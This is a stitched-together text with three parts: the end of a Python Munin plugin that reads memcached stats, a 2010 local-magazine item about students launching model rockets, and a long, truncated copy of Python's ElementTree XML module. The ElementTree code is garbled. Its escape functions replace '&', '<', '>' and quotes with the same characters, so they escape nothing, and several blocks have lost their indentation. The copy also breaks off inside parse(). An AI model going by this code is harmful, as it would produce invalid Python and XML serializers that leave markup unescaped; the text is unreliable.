        port = int(os.environ.get('MEMCACHED_PORT') or '11211')
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host, port))
            # sendall: plain send() may transmit only part of the request.
            s.sendall("stats\n")
            buf = ""
            while 'END\r\n' not in buf:
                chunk = s.recv(1024)
                if not chunk:
                    # Server closed the connection before END: stop instead
                    # of looping forever on empty reads.
                    break
                buf += chunk
        finally:
            # Close the socket even when connect/send/recv raises.
            s.close()
        rows = (line.split(' ', 2) for line in buf.split('\r\n'))
        # Each stats row looks like "STAT <name> <value>".
        return dict((row[1], row[2]) for row in rows if row[0] == 'STAT')

    def execute(self):
        """Map the plugin's configured fields to their current stat values.

        Missing stats are reported as "U" (Munin's "unknown" marker).
        """
        stats = self.get_stats()
        values = {}
        for k, v in self.fields:
            try:
                value = stats[k]
            except KeyError:
                value = "U"
            values[k] = value
        return values
|
June 3, 2010 – Katy, Texas – Morton Ranch Junior High students, including Ashley Thornhill (pictured) and science teacher, Roy Eriksen recently participated in a model rocket project associated with a unit on space exploration. Students got the chance to launch their model rockets from the MRJH football fields. Eriksen played an integral role in designing the lab, as he helped coordinate which rockets the students could build and the order in which they would be launched. The successful project was a collaborative effort among the entire sixth-grade science team, he says, and it was great to see students so engaged and excited about science. Please mention you found this on www.KatyMagazine.com.
|
"""Lightweight XML support for Python.
XML is an inherently hierarchical data format, and the most natural way to
represent it is with a tree. This module has two classes for this purpose:
1. ElementTree represents the whole XML document as a tree and
2. Element represents a single node in this tree.
Interactions with the whole document (reading and writing to/from files) are
usually done on the ElementTree level. Interactions with a single XML element
and its sub-elements are done on the Element level.
Element is a flexible container object designed to store hierarchical data
structures in memory. It can be described as a cross between a list and a
dictionary. Each Element has a number of properties associated with it:
'tag' - a string containing the element's name.
'attributes' - a Python dictionary storing the element's attributes.
'text' - a string containing the element's text content.
'tail' - an optional string containing text after the element's end tag.
And a number of child elements stored in a Python sequence.
To create an element instance, use the Element constructor,
or the SubElement factory function.
You can also use the ElementTree class to wrap an element structure
and convert it to and from XML.
"""
#---------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
#
# ElementTree
# Copyright (c) 1999-2008 by Fredrik Lundh. All rights reserved.
#
# fredrik@pythonware.com
# http://www.pythonware.com
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2008 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
# Names exported by "from ... import *"; this is also the module's
# declared public API.
__all__ = [
    # public symbols
    "Comment",
    "dump",
    "Element", "ElementTree",
    "fromstring", "fromstringlist",
    "indent", "iselement", "iterparse",
    "parse", "ParseError",
    "PI", "ProcessingInstruction",
    "QName",
    "SubElement",
    "tostring", "tostringlist",
    "TreeBuilder",
    "VERSION",
    "XML", "XMLID",
    "XMLParser", "XMLPullParser",
    "register_namespace",
    "canonicalize", "C14NWriterTarget",
    ]

# Version of the original ElementTree toolkit this module derives from
# (kept for backward compatibility; unrelated to the Python version).
VERSION = "1.3.0"
import sys
import re
import warnings
import io
import collections
import collections.abc
import contextlib
from . import ElementPath
class ParseError(SyntaxError):
    """Raised when an XML document cannot be parsed.

    Besides the usual exception value, a ParseError instance carries two
    extra attributes:

    'code' - the specific exception code
    'position' - the line and column of the error

    """
# --------------------------------------------------------------------
def iselement(element):
    """Return True if *element* appears to be an Element."""
    # Duck-typed check: anything exposing a 'tag' attribute qualifies.
    try:
        element.tag
    except AttributeError:
        return False
    return True
class Element:
    """A single node of an XML tree (pure-Python reference implementation).

    The length of an element is its number of subelements, so to decide
    whether an element is genuinely empty you must inspect BOTH its
    length AND its text attribute.

    The element tag, attribute names, and attribute values may each be
    bytes or strings.

    *tag* names the element, *attrib* is an optional dictionary of
    element attributes, and *extra* supplies further attributes as
    keyword arguments.

    Serialized form:

        <tag attrib>text<child/>...</tag>tail

    """

    # The element's name.
    tag = None

    # Dictionary holding the element's attributes.
    attrib = None

    # Text appearing before the first subelement; a string, or None.
    # Whether "no text" is None or "" depends on the parser.
    text = None

    # Text between this element's end tag and the next sibling's start
    # tag; a string, or None (parser-dependent, as for *text*).
    tail = None

    def __init__(self, tag, attrib={}, **extra):
        if not isinstance(attrib, dict):
            raise TypeError("attrib must be dict, not %s" % (
                attrib.__class__.__name__,))
        self.tag = tag
        merged = dict(attrib)
        merged.update(extra)
        self.attrib = merged
        self._children = []

    def __repr__(self):
        return "<%s %r at %#x>" % (type(self).__name__, self.tag, id(self))

    def makeelement(self, tag, attrib):
        """Return a new element of the same type.

        *tag* is the element name, *attrib* a dictionary of attributes.

        Prefer the SubElement factory function over calling this directly.
        """
        return self.__class__(tag, attrib)

    def copy(self):
        """Return a shallow copy of the current element.

        Subelements remain shared with the original tree.
        """
        warnings.warn(
            "elem.copy() is deprecated. Use copy.copy(elem) instead.",
            DeprecationWarning
            )
        return self.__copy__()

    def __copy__(self):
        dup = self.makeelement(self.tag, self.attrib)
        dup.text = self.text
        dup.tail = self.tail
        dup[:] = self
        return dup

    def __len__(self):
        return len(self._children)

    def __bool__(self):
        warnings.warn(
            "The behavior of this method will change in future versions. "
            "Use specific 'len(elem)' or 'elem is not None' test instead.",
            FutureWarning, stacklevel=2
            )
        return len(self._children) != 0  # emulate old behaviour, for now

    def __getitem__(self, index):
        return self._children[index]

    def __setitem__(self, index, element):
        if not isinstance(index, slice):
            self._assert_is_element(element)
        else:
            for item in element:
                self._assert_is_element(item)
        self._children[index] = element

    def __delitem__(self, index):
        del self._children[index]

    def append(self, subelement):
        """Append *subelement* after any existing subelements.

        In document order the new element appears after the last existing
        subelement (or directly after the text when it is the first one),
        but before this element's end tag.
        """
        self._assert_is_element(subelement)
        self._children.append(subelement)

    def extend(self, elements):
        """Append each element of the sequence *elements* in turn.

        *elements* is a sequence with zero or more elements.
        """
        for item in elements:
            self._assert_is_element(item)
            self._children.append(item)

    def insert(self, index, subelement):
        """Insert *subelement* at position *index*."""
        self._assert_is_element(subelement)
        self._children.insert(index, subelement)

    def _assert_is_element(self, e):
        # Compare against the genuine Python implementation, not the
        # shadowing C accelerator class.
        if not isinstance(e, _Element_Py):
            raise TypeError('expected an Element, not %s' % type(e).__name__)

    def remove(self, subelement):
        """Remove the given subelement, matching by identity.

        Unlike the find methods, this compares on object identity, NOT
        on tag value or contents.  To drop subelements by other criteria,
        build the elements to keep with a list comprehension and assign
        them back via slice assignment.

        Raises ValueError when no matching element is present.
        """
        self._children.remove(subelement)

    def find(self, path, namespaces=None):
        """Return the first subelement matching a tag name or XPath.

        *path* is an element tag or an XPath expression, *namespaces* an
        optional prefix -> full-name mapping.

        Returns None when nothing matches.
        """
        return ElementPath.find(self, path, namespaces)

    def findtext(self, path, default=None, namespaces=None):
        """Return the text of the first subelement matching *path*.

        *path* is an element tag or an XPath expression, *default* the
        value returned when nothing matches, *namespaces* an optional
        prefix -> full-name mapping.

        A matching element without text content yields the empty string.
        """
        return ElementPath.findtext(self, path, default, namespaces)

    def findall(self, path, namespaces=None):
        """Return all matching subelements, in document order, as a list.

        *path* is an element tag or an XPath expression, *namespaces* an
        optional prefix -> full-name mapping.
        """
        return ElementPath.findall(self, path, namespaces)

    def iterfind(self, path, namespaces=None):
        """Return an iterable of all matching subelements, in document order.

        *path* is an element tag or an XPath expression, *namespaces* an
        optional prefix -> full-name mapping.
        """
        return ElementPath.iterfind(self, path, namespaces)

    def clear(self):
        """Reset the element.

        Drops all subelements, clears every attribute, and sets the text
        and tail attributes to None.
        """
        self.text = self.tail = None
        self._children = []
        self.attrib.clear()

    def get(self, key, default=None):
        """Return the attribute named *key*, or *default* when absent.

        Equivalent to attrib.get, though implementations may optimize it.
        """
        return self.attrib.get(key, default)

    def set(self, key, value):
        """Set attribute *key* to *value*.

        Equivalent to attrib[key] = value, though implementations may
        optimize it.
        """
        self.attrib[key] = value

    def keys(self):
        """Return the attribute names, in arbitrary (dict) order.

        Equivalent to attrib.keys().
        """
        return self.attrib.keys()

    def items(self):
        """Return the attributes as (name, value) pairs, in arbitrary order.

        Equivalent to attrib.items().
        """
        return self.attrib.items()

    def iter(self, tag=None):
        """Return an iterator over this element and all its descendants.

        Elements are produced in document order; only those whose tag
        matches *tag* are yielded (default: every element).  If the tree
        is mutated during iteration, added or removed elements may or may
        not appear -- materialize with list() for a stable snapshot.
        """
        if tag == "*":
            tag = None
        if tag is None or self.tag == tag:
            yield self
        for child in self._children:
            yield from child.iter(tag)

    def itertext(self):
        """Iterate over all inner text of this subtree, in document order."""
        tag = self.tag
        if tag is not None and not isinstance(tag, str):
            # Comment/PI nodes (non-string tags) contribute no text.
            return
        if self.text:
            yield self.text
        for child in self:
            yield from child.itertext()
            if child.tail:
                yield child.tail
def SubElement(parent, tag, attrib={}, **extra):
    """Create a subelement and attach it to an existing parent.

    The element tag, attribute names, and attribute values may each be
    bytes or Unicode strings.

    *parent* is the parent element, *tag* the subelement's name,
    *attrib* an optional dictionary of element attributes, and *extra*
    supplies further attributes as keyword arguments.
    """
    merged = {**attrib, **extra}
    child = parent.makeelement(tag, merged)
    parent.append(child)
    return child
def Comment(text=None):
    """Comment element factory.

    Builds a special element that the standard serializer writes out as
    an XML comment.

    *text* is a string containing the comment string.
    """
    comment = Element(Comment)
    comment.text = text
    return comment
def ProcessingInstruction(target, text=None):
    """Processing Instruction element factory.

    Builds a special element that the standard serializer writes out as
    an XML processing instruction.

    *target* is a string containing the processing instruction, *text*
    a string with the processing instruction contents, if any.
    """
    pi = Element(ProcessingInstruction)
    if text:
        pi.text = target + " " + text
    else:
        pi.text = target
    return pi

# Conventional short alias.
PI = ProcessingInstruction
class QName:
    """Qualified name wrapper.
    This class can be used to wrap a QName attribute value in order to get
    proper namespace handing on output.
    *text_or_uri* is a string containing the QName value either in the form
    {uri}local, or if the tag argument is given, the URI part of a QName.
    *tag* is an optional argument which if given, will make the first
    argument (text_or_uri) be interpreted as a URI, and this argument (tag)
    be interpreted as a local name.
    """
    def __init__(self, text_or_uri, tag=None):
        # With *tag*, the first argument is a bare URI; combine the two
        # into the canonical "{uri}local" form.
        self.text = "{%s}%s" % (text_or_uri, tag) if tag else text_or_uri

    def __str__(self):
        return self.text

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, self.text)

    def __hash__(self):
        return hash(self.text)

    @staticmethod
    def _other_text(other):
        # Comparisons accept both QName instances and plain strings.
        return other.text if isinstance(other, QName) else other

    def __le__(self, other):
        return self.text <= self._other_text(other)

    def __lt__(self, other):
        return self.text < self._other_text(other)

    def __ge__(self, other):
        return self.text >= self._other_text(other)

    def __gt__(self, other):
        return self.text > self._other_text(other)

    def __eq__(self, other):
        return self.text == self._other_text(other)
# --------------------------------------------------------------------
class ElementTree:
    """An XML element hierarchy.
    This class also provides support for serialization to and from
    standard XML.
    *element* is an optional root element node,
    *file* is an optional file handle or file name of an XML file whose
    contents will be used to initialize the tree with.
    """
    def __init__(self, element=None, file=None):
        # assert element is None or iselement(element)
        self._root = element # first node
        if file:
            self.parse(file)
    def getroot(self):
        """Return root element of this tree."""
        return self._root
    def _setroot(self, element):
        """Replace root element of this tree.
        This will discard the current contents of the tree and replace it
        with the given element. Use with care!
        """
        # assert iselement(element)
        self._root = element
    def parse(self, source, parser=None):
        """Load external XML document into element tree.
        *source* is a file name or file object, *parser* is an optional parser
        instance that defaults to XMLParser.
        ParseError is raised if the parser fails to parse the document.
        Returns the root element of the given source document.
        """
        close_source = False
        if not hasattr(source, "read"):
            # *source* is a path: we opened it, so we must close it below.
            source = open(source, "rb")
            close_source = True
        try:
            if parser is None:
                # If no parser was specified, create a default XMLParser
                parser = XMLParser()
                if hasattr(parser, '_parse_whole'):
                    # The default XMLParser, when it comes from an accelerator,
                    # can define an internal _parse_whole API for efficiency.
                    # It can be used to parse the whole source without feeding
                    # it with chunks.
                    self._root = parser._parse_whole(source)
                    return self._root
            # Feed the parser incrementally (64 KiB chunks) to bound memory.
            while True:
                data = source.read(65536)
                if not data:
                    break
                parser.feed(data)
            self._root = parser.close()
            return self._root
        finally:
            if close_source:
                source.close()
    def iter(self, tag=None):
        """Create and return tree iterator for the root element.
        The iterator loops over all elements in this tree, in document order.
        *tag* is a string with the tag name to iterate over
        (default is to return all elements).
        """
        # assert self._root is not None
        return self._root.iter(tag)
    def find(self, path, namespaces=None):
        """Find first matching element by tag name or path.
        Same as getroot().find(path), which is Element.find()
        *path* is a string having either an element tag or an XPath,
        *namespaces* is an optional mapping from namespace prefix to full name.
        Return the first matching element, or None if no element was found.
        """
        # assert self._root is not None
        if path[:1] == "/":
            # Absolute paths were historically mis-handled; warn and rewrite
            # to a relative search from the root.
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version. If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.find(path, namespaces)
    def findtext(self, path, default=None, namespaces=None):
        """Find first matching element by tag name or path.
        Same as getroot().findtext(path), which is Element.findtext()
        *path* is a string having either an element tag or an XPath,
        *namespaces* is an optional mapping from namespace prefix to full name.
        Return the first matching element, or None if no element was found.
        """
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version. If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.findtext(path, default, namespaces)
    def findall(self, path, namespaces=None):
        """Find all matching subelements by tag name or path.
        Same as getroot().findall(path), which is Element.findall().
        *path* is a string having either an element tag or an XPath,
        *namespaces* is an optional mapping from namespace prefix to full name.
        Return list containing all matching elements in document order.
        """
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version. If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.findall(path, namespaces)
    def iterfind(self, path, namespaces=None):
        """Find all matching subelements by tag name or path.
        Same as getroot().iterfind(path), which is element.iterfind()
        *path* is a string having either an element tag or an XPath,
        *namespaces* is an optional mapping from namespace prefix to full name.
        Return an iterable yielding all matching elements in document order.
        """
        # assert self._root is not None
        if path[:1] == "/":
            path = "." + path
            warnings.warn(
                "This search is broken in 1.3 and earlier, and will be "
                "fixed in a future version. If you rely on the current "
                "behaviour, change it to %r" % path,
                FutureWarning, stacklevel=2
                )
        return self._root.iterfind(path, namespaces)
    def write(self, file_or_filename,
              encoding=None,
              xml_declaration=None,
              default_namespace=None,
              method=None, *,
              short_empty_elements=True):
        """Write element tree to a file as XML.
        Arguments:
          *file_or_filename* -- file name or a file object opened for writing
          *encoding* -- the output encoding (default: US-ASCII)
          *xml_declaration* -- bool indicating if an XML declaration should be
                               added to the output. If None, an XML declaration
                               is added if encoding IS NOT either of:
                               US-ASCII, UTF-8, or Unicode
          *default_namespace* -- sets the default XML namespace (for "xmlns")
          *method* -- either "xml" (default), "html", "text", or "c14n"
          *short_empty_elements* -- controls the formatting of elements
                                    that contain no content. If True (default)
                                    they are emitted as a single self-closed
                                    tag, otherwise they are emitted as a pair
                                    of start/end tags
        """
        if not method:
            method = "xml"
        elif method not in _serialize:
            raise ValueError("unknown method %r" % method)
        if not encoding:
            if method == "c14n":
                encoding = "utf-8"
            else:
                encoding = "us-ascii"
        enc_lower = encoding.lower()
        with _get_writer(file_or_filename, enc_lower) as write:
            if method == "xml" and (xml_declaration or
                    (xml_declaration is None and
                     enc_lower not in ("utf-8", "us-ascii", "unicode"))):
                declared_encoding = encoding
                if enc_lower == "unicode":
                    # Retrieve the default encoding for the xml declaration
                    import locale
                    declared_encoding = locale.getpreferredencoding()
                write("<?xml version='1.0' encoding='%s'?>\n" % (
                    declared_encoding,))
            if method == "text":
                _serialize_text(write, self._root)
            else:
                # Build the qname/namespace tables once, then dispatch to the
                # serializer registered for *method*.
                qnames, namespaces = _namespaces(self._root, default_namespace)
                serialize = _serialize[method]
                serialize(write, self._root, qnames, namespaces,
                          short_empty_elements=short_empty_elements)
    def write_c14n(self, file):
        # lxml.etree compatibility. use output method instead
        return self.write(file, method="c14n")
# --------------------------------------------------------------------
# serialization support
@contextlib.contextmanager
def _get_writer(file_or_filename, encoding):
    """Yield a text ``write`` callable for *file_or_filename*, releasing
    every resource acquired here when the context exits.
    """
    # returns text write method and release all resources after using
    try:
        write = file_or_filename.write
    except AttributeError:
        # file_or_filename is a file name
        if encoding == "unicode":
            file = open(file_or_filename, "w")
        else:
            file = open(file_or_filename, "w", encoding=encoding,
                        errors="xmlcharrefreplace")
        with file:
            yield file.write
    else:
        # file_or_filename is a file-like object
        # encoding determines if it is a text or binary writer
        if encoding == "unicode":
            # use a text writer as is
            yield write
        else:
            # wrap a binary writer with TextIOWrapper
            with contextlib.ExitStack() as stack:
                if isinstance(file_or_filename, io.BufferedIOBase):
                    file = file_or_filename
                elif isinstance(file_or_filename, io.RawIOBase):
                    file = io.BufferedWriter(file_or_filename)
                    # Keep the original file open when the BufferedWriter is
                    # destroyed
                    stack.callback(file.detach)
                else:
                    # This is to handle passed objects that aren't in the
                    # IOBase hierarchy, but just have a write method
                    file = io.BufferedIOBase()
                    file.writable = lambda: True
                    file.write = write
                    try:
                        # TextIOWrapper uses this methods to determine
                        # if BOM (for UTF-16, etc) should be added
                        file.seekable = file_or_filename.seekable
                        file.tell = file_or_filename.tell
                    except AttributeError:
                        pass
                file = io.TextIOWrapper(file,
                                        encoding=encoding,
                                        errors="xmlcharrefreplace",
                                        newline="\n")
                # Keep the original file open when the TextIOWrapper is
                # destroyed
                stack.callback(file.detach)
                yield file.write
def _namespaces(elem, default_namespace=None):
    """Build the serialization tables for *elem*'s subtree.
    Returns a (qnames, namespaces) pair: *qnames* maps each "{uri}local"
    name seen in the tree to its serialized "prefix:local" form, and
    *namespaces* maps each namespace URI to the prefix chosen for it.
    """
    # identify namespaces used in this tree
    # maps qnames to *encoded* prefix:local names
    qnames = {None: None}
    # maps uri:s to prefixes
    namespaces = {}
    if default_namespace:
        namespaces[default_namespace] = ""
    def add_qname(qname):
        # calculate serialized qname representation
        try:
            if qname[:1] == "{":
                uri, tag = qname[1:].rsplit("}", 1)
                prefix = namespaces.get(uri)
                if prefix is None:
                    # Prefer a "well-known" prefix; otherwise invent nsN.
                    prefix = _namespace_map.get(uri)
                    if prefix is None:
                        prefix = "ns%d" % len(namespaces)
                    if prefix != "xml":
                        namespaces[uri] = prefix
                if prefix:
                    qnames[qname] = "%s:%s" % (prefix, tag)
                else:
                    qnames[qname] = tag # default element
            else:
                if default_namespace:
                    # FIXME: can this be handled in XML 1.0?
                    raise ValueError(
                        "cannot use non-qualified names with "
                        "default_namespace option"
                        )
                qnames[qname] = qname
        except TypeError:
            _raise_serialization_error(qname)
    # populate qname and namespaces table
    for elem in elem.iter():
        tag = elem.tag
        if isinstance(tag, QName):
            if tag.text not in qnames:
                add_qname(tag.text)
        elif isinstance(tag, str):
            if tag not in qnames:
                add_qname(tag)
        elif tag is not None and tag is not Comment and tag is not PI:
            _raise_serialization_error(tag)
        for key, value in elem.items():
            if isinstance(key, QName):
                key = key.text
            if key not in qnames:
                add_qname(key)
            if isinstance(value, QName) and value.text not in qnames:
                add_qname(value.text)
        text = elem.text
        if isinstance(text, QName) and text.text not in qnames:
            add_qname(text.text)
    return qnames, namespaces
def _serialize_xml(write, elem, qnames, namespaces,
                   short_empty_elements, **kwargs):
    # Recursively emit *elem* (and its tail text) through *write*, using the
    # qname table built by _namespaces().  *namespaces* is non-None only for
    # the root call, where the xmlns declarations are written.
    tag = elem.tag
    text = elem.text
    if tag is Comment:
        write("<!--%s-->" % text)
    elif tag is ProcessingInstruction:
        write("<?%s?>" % text)
    else:
        tag = qnames[tag]
        if tag is None:
            # Tag-less node: serialize only its text and children.
            if text:
                write(_escape_cdata(text))
            for e in elem:
                _serialize_xml(write, e, qnames, None,
                               short_empty_elements=short_empty_elements)
        else:
            write("<" + tag)
            items = list(elem.items())
            if items or namespaces:
                if namespaces:
                    for v, k in sorted(namespaces.items(),
                                       key=lambda x: x[1]): # sort on prefix
                        if k:
                            k = ":" + k
                        write(" xmlns%s=\"%s\"" % (
                            k,
                            _escape_attrib(v)
                            ))
                for k, v in items:
                    if isinstance(k, QName):
                        k = k.text
                    if isinstance(v, QName):
                        v = qnames[v.text]
                    else:
                        v = _escape_attrib(v)
                    write(" %s=\"%s\"" % (qnames[k], v))
            if text or len(elem) or not short_empty_elements:
                write(">")
                if text:
                    write(_escape_cdata(text))
                for e in elem:
                    _serialize_xml(write, e, qnames, None,
                                   short_empty_elements=short_empty_elements)
                write("</" + tag + ">")
            else:
                # Empty element: self-closing form.
                write(" />")
    if elem.tail:
        write(_escape_cdata(elem.tail))
HTML_EMPTY = ("area", "base", "basefont", "br", "col", "frame", "hr",
"img", "input", "isindex", "link", "meta", "param")
try:
HTML_EMPTY = set(HTML_EMPTY)
except NameError:
pass
def _serialize_html(write, elem, qnames, namespaces, **kwargs):
    # HTML variant of _serialize_xml: void elements (HTML_EMPTY) get no end
    # tag, and the contents of <script>/<style> are written unescaped.
    tag = elem.tag
    text = elem.text
    if tag is Comment:
        write("<!--%s-->" % _escape_cdata(text))
    elif tag is ProcessingInstruction:
        write("<?%s?>" % _escape_cdata(text))
    else:
        tag = qnames[tag]
        if tag is None:
            if text:
                write(_escape_cdata(text))
            for e in elem:
                _serialize_html(write, e, qnames, None)
        else:
            write("<" + tag)
            items = list(elem.items())
            if items or namespaces:
                if namespaces:
                    for v, k in sorted(namespaces.items(),
                                       key=lambda x: x[1]): # sort on prefix
                        if k:
                            k = ":" + k
                        write(" xmlns%s=\"%s\"" % (
                            k,
                            _escape_attrib(v)
                            ))
                for k, v in items:
                    if isinstance(k, QName):
                        k = k.text
                    if isinstance(v, QName):
                        v = qnames[v.text]
                    else:
                        v = _escape_attrib_html(v)
                    # FIXME: handle boolean attributes
                    write(" %s=\"%s\"" % (qnames[k], v))
            write(">")
            ltag = tag.lower()
            if text:
                if ltag == "script" or ltag == "style":
                    # Raw-text elements: escaping would corrupt the content.
                    write(text)
                else:
                    write(_escape_cdata(text))
            for e in elem:
                _serialize_html(write, e, qnames, None)
            if ltag not in HTML_EMPTY:
                write("</" + tag + ">")
    if elem.tail:
        write(_escape_cdata(elem.tail))
def _serialize_text(write, elem):
for part in elem.itertext():
write(part)
if elem.tail:
write(elem.tail)
# Dispatch table mapping a serialization *method* name (as accepted by
# ElementTree.write()/tostring()) to its serializer function.
_serialize = {
    "xml": _serialize_xml,
    "html": _serialize_html,
    "text": _serialize_text,
# this optional method is imported at the end of the module
#     "c14n": _serialize_c14n,
}
def register_namespace(prefix, uri):
    """Register a namespace prefix.
    The registry is global, and any existing mapping for either the
    given prefix or the namespace URI will be removed.
    *prefix* is the namespace prefix, *uri* is a namespace uri. Tags and
    attributes in this namespace will be serialized with prefix if possible.
    ValueError is raised if prefix is reserved or is invalid.
    """
    # "nsN" prefixes are generated internally by _namespaces().
    if re.match(r"ns\d+$", prefix):
        raise ValueError("Prefix format reserved for internal use")
    # Purge every entry that collides with either side of the new pair,
    # then insert it.
    stale = [u for u, p in _namespace_map.items() if u == uri or p == prefix]
    for u in stale:
        del _namespace_map[u]
    _namespace_map[uri] = prefix
# Global registry of preferred namespace prefixes, consulted by
# _namespaces() when choosing how to serialize a URI; extended at runtime
# via register_namespace().
_namespace_map = {
    # "well-known" namespace prefixes
    "http://www.w3.org/XML/1998/namespace": "xml",
    "http://www.w3.org/1999/xhtml": "html",
    "http://www.w3.org/1999/02/22-rdf-syntax-ns#": "rdf",
    "http://schemas.xmlsoap.org/wsdl/": "wsdl",
    # xml schema
    "http://www.w3.org/2001/XMLSchema": "xs",
    "http://www.w3.org/2001/XMLSchema-instance": "xsi",
    # dublin core
    "http://purl.org/dc/elements/1.1/": "dc",
}
# For tests and troubleshooting
register_namespace._namespace_map = _namespace_map
def _raise_serialization_error(text):
raise TypeError(
"cannot serialize %r (type %s)" % (text, type(text).__name__)
)
def _escape_cdata(text):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 characters, or so. assume that's, by far,
# the most common case in most applications.
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib(text):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
# Although section 2.11 of the XML specification states that CR or
# CR LN should be replaced with just LN, it applies only to EOLNs
# which take part of organizing file into lines. Within attributes,
# we are replacing these with entity numbers, so they do not count.
# http://www.w3.org/TR/REC-xml/#sec-line-ends
# The current solution, contained in following six lines, was
# discussed in issue 17582 and 39011.
if "\r" in text:
text = text.replace("\r", " ")
if "\n" in text:
text = text.replace("\n", " ")
if "\t" in text:
text = text.replace("\t", "	")
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_html(text):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
def tostring(element, encoding=None, method=None, *,
             xml_declaration=None, default_namespace=None,
             short_empty_elements=True):
    """Generate string representation of XML element.
    All subelements are included. If encoding is "unicode", a string
    is returned. Otherwise a bytestring is returned.
    *element* is an Element instance, *encoding* is an optional output
    encoding defaulting to US-ASCII, *method* is an optional output which can
    be one of "xml" (default), "html", "text" or "c14n", *default_namespace*
    sets the default XML namespace (for "xmlns").
    Returns an (optionally) encoded string containing the XML data.
    """
    # "unicode" means a text result; everything else is serialized to bytes.
    if encoding == 'unicode':
        buffer = io.StringIO()
    else:
        buffer = io.BytesIO()
    ElementTree(element).write(buffer, encoding,
                               xml_declaration=xml_declaration,
                               default_namespace=default_namespace,
                               method=method,
                               short_empty_elements=short_empty_elements)
    return buffer.getvalue()
class _ListDataStream(io.BufferedIOBase):
"""An auxiliary stream accumulating into a list reference."""
def __init__(self, lst):
self.lst = lst
def writable(self):
return True
def seekable(self):
return True
def write(self, b):
self.lst.append(b)
def tell(self):
return len(self.lst)
def tostringlist(element, encoding=None, method=None, *,
                 xml_declaration=None, default_namespace=None,
                 short_empty_elements=True):
    # Like tostring(), but returns the raw list of chunks the serializer
    # wrote instead of joining them into one string.
    chunks = []
    ElementTree(element).write(_ListDataStream(chunks), encoding,
                               xml_declaration=xml_declaration,
                               default_namespace=default_namespace,
                               method=method,
                               short_empty_elements=short_empty_elements)
    return chunks
def dump(elem):
    """Write element tree or element structure to sys.stdout.
    This function should be used for debugging only.
    *elem* is either an ElementTree, or a single Element. The exact output
    format is implementation dependent. In this version, it's written as an
    ordinary XML file.
    """
    # debugging
    tree = elem if isinstance(elem, ElementTree) else ElementTree(elem)
    tree.write(sys.stdout, encoding="unicode")
    # Make sure the dump ends with a newline for readable output.
    tail = tree.getroot().tail
    if not tail or not tail.endswith("\n"):
        sys.stdout.write("\n")
def indent(tree, space="  ", level=0):
    """Indent an XML document by inserting newlines and indentation space
    after elements.
    *tree* is the ElementTree or Element to modify. The (root) element
    itself will not be changed, but the tail text of all elements in its
    subtree will be adapted.
    *space* is the whitespace to insert for each indentation level, two
    space characters by default.
    *level* is the initial indentation level. Setting this to a higher
    value than 0 can be used for indenting subtrees that are more deeply
    nested inside of a document.
    """
    # NOTE: the default is two spaces, matching the docstring above (the
    # previous single-space default contradicted the documented behaviour).
    if isinstance(tree, ElementTree):
        tree = tree.getroot()
    if level < 0:
        raise ValueError(f"Initial indentation level must be >= 0, got {level}")
    if not len(tree):
        return
    # Reduce the memory consumption by reusing indentation strings.
    indentations = ["\n" + level * space]
    def _indent_children(elem, level):
        # Start a new indentation level for the first child.
        child_level = level + 1
        try:
            child_indentation = indentations[child_level]
        except IndexError:
            child_indentation = indentations[level] + space
            indentations.append(child_indentation)
        if not elem.text or not elem.text.strip():
            elem.text = child_indentation
        for child in elem:
            if len(child):
                _indent_children(child, child_level)
            if not child.tail or not child.tail.strip():
                child.tail = child_indentation
        # Dedent after the last child by overwriting the previous indentation.
        if not child.tail.strip():
            child.tail = indentations[level]
    # Levels passed here index into *indentations*, whose first entry
    # already accounts for the initial *level* offset.
    _indent_children(tree, 0)
# --------------------------------------------------------------------
# parsing
def parse(source, parser=None):
    """Parse XML document into element tree.
    *source* is a filename or file object containing XML data,
    *parser* is an optional parser instance defaulting to XMLParser.
    Return an ElementTree instance.
    """
    # Delegate the actual work to ElementTree.parse().
